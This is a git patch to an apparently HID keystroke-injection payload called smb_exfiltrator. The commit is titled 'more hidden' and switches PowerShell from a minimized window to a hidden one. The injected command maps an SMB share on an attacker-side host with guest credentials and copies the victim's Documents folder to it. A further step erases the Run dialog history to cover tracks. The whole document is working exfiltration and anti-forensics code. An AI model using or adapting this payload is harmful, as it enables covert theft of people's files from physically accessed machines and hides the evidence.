From 2978c85d6a821d5ad5581ef596adae85485093b5 Mon Sep 17 00:00:00 2001 From: Surreal Date: Wed, 22 Mar 2017 16:13:32 -0400 Subject: [PATCH] Updated smb_exfiltrator to be more hidden Modified -WindowStyle to be hidden instead of minimized --- payloads/library/smb_exfiltrator/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt index 06310fa0..850bfa80 100644 --- a/payloads/library/smb_exfiltrator/payload.txt +++ b/payloads/library/smb_exfiltrator/payload.txt @@ -40,7 +40,7 @@ LED R G ATTACKMODE HID QUACK GUI r QUACK DELAY 500 -QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" +QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" QUACK ENTER # Clear tracks? @@ -48,7 +48,7 @@ if [ $CLEARTRACKS == "yes" ]; then QUACK DELAY 500 QUACK GUI r QUACK DELAY 500 - QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" QUACK ENTER fi